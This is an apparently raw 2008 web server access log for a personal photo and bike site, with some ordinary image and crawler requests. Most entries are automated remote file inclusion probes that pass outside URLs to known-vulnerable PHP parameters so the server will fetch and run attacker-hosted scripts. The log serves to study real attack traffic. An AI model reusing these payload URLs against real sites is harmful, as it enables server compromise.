211.214.161.239 - - [26/Oct/2008:09:12:19 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:12:33 -0700] "GET /logs//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:09:12:34 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:12:34 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:12:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-169_0.jpg HTTP/1.1" 200 290226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:12:42 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:12:43 -0700] "GET /?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 8097 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:12:43 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:12:44 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:12:44 -0700] "GET /logs//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 70881 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:12:45 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:12:47 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/050.jpg HTTP/1.1" 200 228086 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:12:51 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:12:51 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:12:51 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
63.247.65.114 - - [26/Oct/2008:09:12:58 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [26/Oct/2008:09:12:59 -0700] "GET /phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:12:59 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:13:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-156_1.jpg HTTP/1.1" 200 490657 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:13:14 -0700] "GET /logs/access_081015.log//index2.php?page=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.254.55.178 - - [26/Oct/2008:09:13:14 -0700] "GET /index2.php?page=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:13:14 -0700] "GET /logs//index2.php?page=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.247.65.114 - - [26/Oct/2008:09:13:23 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:13:31 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.65.114 - - [26/Oct/2008:09:13:40 -0700] "GET /phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:13:42 -0700] "GET /logs//?page=http://www.starwarsally.net/id.txt?? HTTP/1.1" 200 70881 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:13:46 -0700] "GET /?page=http://www.starwarsally.net/id.txt?? HTTP/1.1" 200 94728 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:13:54 -0700] "GET /logs//?page=http://www.starwarsally.net/id.txt?? HTTP/1.1" 200 70881 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:13:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-042_3.jpg HTTP/1.1" 200 344459 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:13:59 -0700] "GET /?page=http://www.starwarsally.net/id.txt?? HTTP/1.1" 200 94744 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.55.178 - - [26/Oct/2008:09:14:07 -0700] "GET /logs/access_080916.log//index2.php?page=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:14:07 -0700] "GET /logs/access_080705.log/order.php?pag=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:14:10 -0700] "GET /order.php?pag=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:14:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-136.jpg HTTP/1.1" 200 594718 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:10 -0700] "GET /logs/access_080519.log/order.php?pag=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:14:11 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:14:11 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:14:11 -0700] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:14:11 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:17 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.108.193 - - [26/Oct/2008:09:14:18 -0700] "GET /blog/index.php/page/2/?show=slide&pageid=17&nggpage=5 HTTP/1.1" 200 13573 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:14:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-009_1.jpg HTTP/1.1" 200 545016 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:31 -0700] "GET /blog/index.php/2008/08/12/westoc-2008-trip-61208-62708/?show=slide&nggpage=14 HTTP/1.1" 200 66127 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
130.237.188.210 - - [26/Oct/2008:09:14:37 -0700] "GET /logs/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
130.237.188.210 - - [26/Oct/2008:09:14:37 -0700] "GET /logs/access_080405.log/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-033.jpg HTTP/1.1" 200 400718 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
130.237.188.210 - - [26/Oct/2008:09:14:37 -0700] "GET /index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 200 94845 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:42 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.88.49.6 - - [26/Oct/2008:09:14:42 -0700] "GET /logs/access_080714.log//citywriter/head.php?path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:42 -0700] "GET /logs/access_080118.log//citywriter/head.php?path=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.139.67.20 - - [26/Oct/2008:09:14:47 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.139.67.20 - - [26/Oct/2008:09:14:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.139.67.20 - - [26/Oct/2008:09:14:47 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:51 -0700] "GET /logs//citywriter/head.php?path=http://rubi1.100megsfree8.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:14:51 -0700] "GET /citywriter/head.php?path=http://rubi1.100megsfree8.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:14:53 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/025.jpg HTTP/1.1" 200 433021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
208.83.106.201 - - [26/Oct/2008:09:14:54 -0700] "GET /logs/access_080124.log//include/write.php?dir=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:15:18 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/016.jpg HTTP/1.1" 200 311660 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:15:21 -0700] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:15:21 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:15:21 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:09:15:24 -0700] "GET /logs/access_080322.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:15:24 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:15:25 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:15:25 -0700] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
65.55.108.193 - - [26/Oct/2008:09:15:38 -0700] "GET /bikes/dteel/DesertSTOC07/?M=A HTTP/1.1" 200 7619 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.108.193 - - [26/Oct/2008:09:15:57 -0700] "GET /bikes/dteel/2008_02_07/?N=A HTTP/1.1" 200 2537 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.108.193 - - [26/Oct/2008:09:16:16 -0700] "GET /blog/index.php/page/2/?show=slide&pageid=169&nggpage=5 HTTP/1.1" 200 13574 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:16:33 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:16:33 -0700] "GET /logs//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 70881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:16:33 -0700] "GET /?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 8097 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
65.55.108.193 - - [26/Oct/2008:09:16:34 -0700] "GET /blog/index.php/page/2/?show=slide&pageid=163&nggpage=5 HTTP/1.1" 200 13574 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
130.88.203.170 - - [26/Oct/2008:09:16:40 -0700] "GET /logs/access_080405.log/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
130.88.203.170 - - [26/Oct/2008:09:16:40 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
130.88.203.170 - - [26/Oct/2008:09:16:40 -0700] "GET /logs/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:16:41 -0700] "GET /index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 200 94845 "-" "libwww-perl/5.805" "www.dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:16:43 -0700] "GET /logs/access_080907.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:16:44 -0700] "GET /logs/access_081007.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:16:45 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:16:45 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.83.22.156 - - [26/Oct/2008:09:16:58 -0700] "GET /logs/access_080405.log/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:16:58 -0700] "GET /logs/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:16:58 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.83.22.156 - - [26/Oct/2008:09:16:59 -0700] "GET /index.php?pageurl=http://devel.ygrenier.com/n.txt??%0D?? HTTP/1.1" 200 94861 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:17:18 -0700] "GET /?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 8097 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:17:22 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:17:22 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:17:22 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:17:30 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:17:31 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
118.219.254.108 - - [26/Oct/2008:09:17:31 -0700] "GET /logs/access_080927.log///vwar/backup/errors.php?error=http://tugaspeed.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:17:32 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:17:32 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:09:17:33 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:09:17:33 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
174.133.202.130 - - [26/Oct/2008:09:17:33 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:17:37 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:17:39 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:17:47 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:17:47 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.235.90.6 - - [26/Oct/2008:09:17:47 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:17:54 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:17:58 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.78.225.22 - - [26/Oct/2008:09:17:58 -0700] "GET /errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:18:00 -0700] "GET /logs/access_080529.log/errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:18:03 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [26/Oct/2008:09:18:03 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:18:03 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [26/Oct/2008:09:18:04 -0700] "GET /logs/access_081015.log//twindow_search_rank.php?shop_this_skin_path=http://musicsalang.com/technote7/data/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.31.58.188 - - [26/Oct/2008:09:18:10 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:18:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
118.219.254.108 - - [26/Oct/2008:09:18:17 -0700] "GET /logs/access_080925.log///vwar/backup/errors.php?error=http://tugaspeed.info/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
